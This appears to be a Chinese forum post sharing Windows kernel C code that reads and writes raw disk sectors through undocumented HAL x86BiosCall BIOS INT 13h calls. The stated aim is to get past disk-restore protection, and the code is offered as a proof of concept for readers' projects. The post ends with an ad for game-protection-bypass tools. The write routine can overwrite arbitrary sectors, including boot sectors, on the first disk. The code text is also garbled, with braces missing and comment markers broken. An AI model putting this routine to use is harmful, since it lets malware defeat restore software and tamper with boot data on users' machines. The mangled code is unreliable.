读写硬盘的一种新模式(无视大部分还原.doc

雨伞ATAPI系列读写硬盘被大量穿透还原的恶意代码应用从而导致ATAPI读写磁盘已经不靠谱了，所以需要一种新方法如果喜欢请关注小站 用IDA打开HAL我们发现一组新的导出call不过有操作系统限制，而且使用起来有操作系统限制（不过随着win7,win8的普及应该没啥问题了）不过也是很犀利的详情见代码：代码:typedef struct _X86BIOS_REGISTERS / invented names ULONG Eax; ULONG Ecx; ULONG Edx; ULONG Ebx; ULONG Ebp; ULONG Esi; ULONG Edi; USHORT SegDs; USHORT SegEs; X86BIOS_REGISTERS, *PX86BIOS_REGISTERS;NTHALAPI BOOLEAN x86BiosCall (ULONG, PX86BIOS_REGISTERS);NTHALAPI NTSTATUS x86BiosAllocateBuffer (ULONG *, USHORT *, USHORT *);NTHALAPI NTSTATUS x86BiosFreeBuffer (USHORT, USHORT);NTHALAPI NTSTATUS x86BiosReadMemory (USHORT, USHORT, PVOID, ULONG);NTHALAPI NTSTATUS x86BiosWriteMemory (USHORT, USHORT, PVOID, ULONG);#pragma pack(1)typedef struct _X86DISK_PACKET_ USHORT Size; USHORT Sectors; USHORT Addr; USHORT Segment; ULONG64 StartSectorNumber; ULONG64 L_BufferAddr;X86DISK_PACKET,*PX86DISK_PACKET;#pragma pack()BOOL ReadDiskByInt13Ext(ULONG64 sector,USHORT numbers,PVOID *OutBuffer,UINT *nSize) ULONG cb = 0; BOOL bRet=FALSE; USHORT bufSeg=0,bufAddr=0; USHORT dpSeg=0,dpAddr=0; BOOL bBuf=FALSE; BOOL bDp =FALSE; NTSTATUS ns; X86DISK_PACKET dp; X86BIOS_REGISTERS regs; _try if (!OutBuffer|!nSize) _leave; cb = numbers*512;/默认512一个sec这样看起来还行，其实应该好好计算的 ns = x86BiosAllocateBuffer(&cb,&bufSeg,&bufAddr); if (!NT_SUCCESS(ns) _leave; bBuf =TRUE; cb = sizeof(X86DISK_PACKET); ns = x86BiosAllocateBuffer(&cb,&dpSeg,&dpAddr); if (!NT_SUCCESS(ns) _leave; bDp =TRUE; dp.Size = 0x10; dp.Sectors = numbers; dp.StartSectorNumber = sector; dp.Segment = bufSeg; dp.Addr = bufAddr; dp.L_BufferAddr=0; ns = x86BiosWriteMemory(dpSeg,dpAddr,&dp,sizeof(X86DISK_PACKET); if(!NT_SUCCESS(ns) _leave; RtlZeroMemory(®s,sizeof(X86BIOS_REGISTERS); regs.Eax = 0x4200;/AH=0x42 regs.Edx = 0x0080;/DL=0x80 /第一个磁盘 regs.SegDs = dpSeg; regs.Esi=dpAddr; if (x86BiosCall(0x13,®s) UINT iSize = numbers*512; PVOID Buffer = ExAllocatePool(NonPagedPool,iSize); if (Buffer) ns = x86BiosReadMemory(bufSeg,bufAddr,Buffer,iSize); if (NT_SUCCESS(ns) *OutBuffer = Buffer; *nSize=iSize; bRet =TRUE; else ExFreePool(Buffer); _except(EXCEPTION_EXECUTE_HANDLER) DbgPrint(Exception From Read); if (bBuf) x86BiosFreeBuffer(bufSeg,bufAddr); if (bDp) x86BiosFreeBuffer(dpSeg,dpAddr); return bRet;BOOL WriteDiskInt13Ext(ULONG64 Sector,PVOID InBuffer,INT nInBuffSize) ULONG cb = 0; BOOL bRet=FALSE; USHORT bufSeg=0,bufAddr=0; USHORT dpSeg=0,dpAddr=0; BOOL bBuf=FALSE; BOOL bDp =FALSE; NTSTATUS ns; X86DISK_PACKET dp; X86BIOS_REGISTERS regs; USHORT numbers =0; _try if (!InBuffer|!nInBuffSize) _leave; numbers = nInBuffSize/512; cb = nInBuffSize;/默认512一个sec这样看起来还行，其实应该好好计算的 ns = x86BiosAllocateBuffer(&cb,&bufSeg,&bufAddr); if (!NT_SUCCESS(ns) _leave; bBuf =TRUE; cb = sizeof(X86DISK_PACKET); ns = x86BiosAllocateBuffer(&cb,&dpSeg,&dpAddr); if (!NT_SUCCESS(ns) _leave; bDp =TRUE; dp.Size = 0x10; dp.Sectors = numbers; dp.StartSectorNumber = Sector; dp.Segment = bufSeg; dp.Addr = bufAddr; dp.L_BufferAddr=0; ns = x86BiosWriteMemory(bufSeg,bufAddr,InBuffer,nInBuffSize); ns = x86BiosWriteMemory(dpSeg,dpAddr,&dp,sizeof(X86DISK_PACKET); if(!NT_SUCCESS(ns) _leave; RtlZeroMemory(®s,sizeof(X86BIOS_REGISTERS); regs.Eax = 0x4300;/AH=0x42 regs.Edx = 0x0080;/DL=0x80 /第一个磁盘 regs.SegDs = dpSeg; regs.Esi=dpAddr; if (x86BiosCall(0x13,®s) bRet =TRUE; _except(EXCEPTION_EXECUTE_HANDLER) DbgPrint(Exception From Read); if (bBuf) x86BiosFreeBuffer(bufSeg,bufAddr); if (bDp) x86BiosFreeBuffer(dpSeg,dpAddr); return bRet;注意部分系统下要注册一个KeRegisterBugCheckCallBack然后通过自己调用BugCheck在自己的CallBack里才能随心所欲的使用这个代码囧最后，这个代码只是个POC真正想要可用于各位的伟大事业必须继续努力修改和做很多处理，亲（伸手党必然被砍手）求捐助，求赞助，求投资，有意者欢迎联系QQ:86879759欲购买 AntiGameProtect或UltraGameProt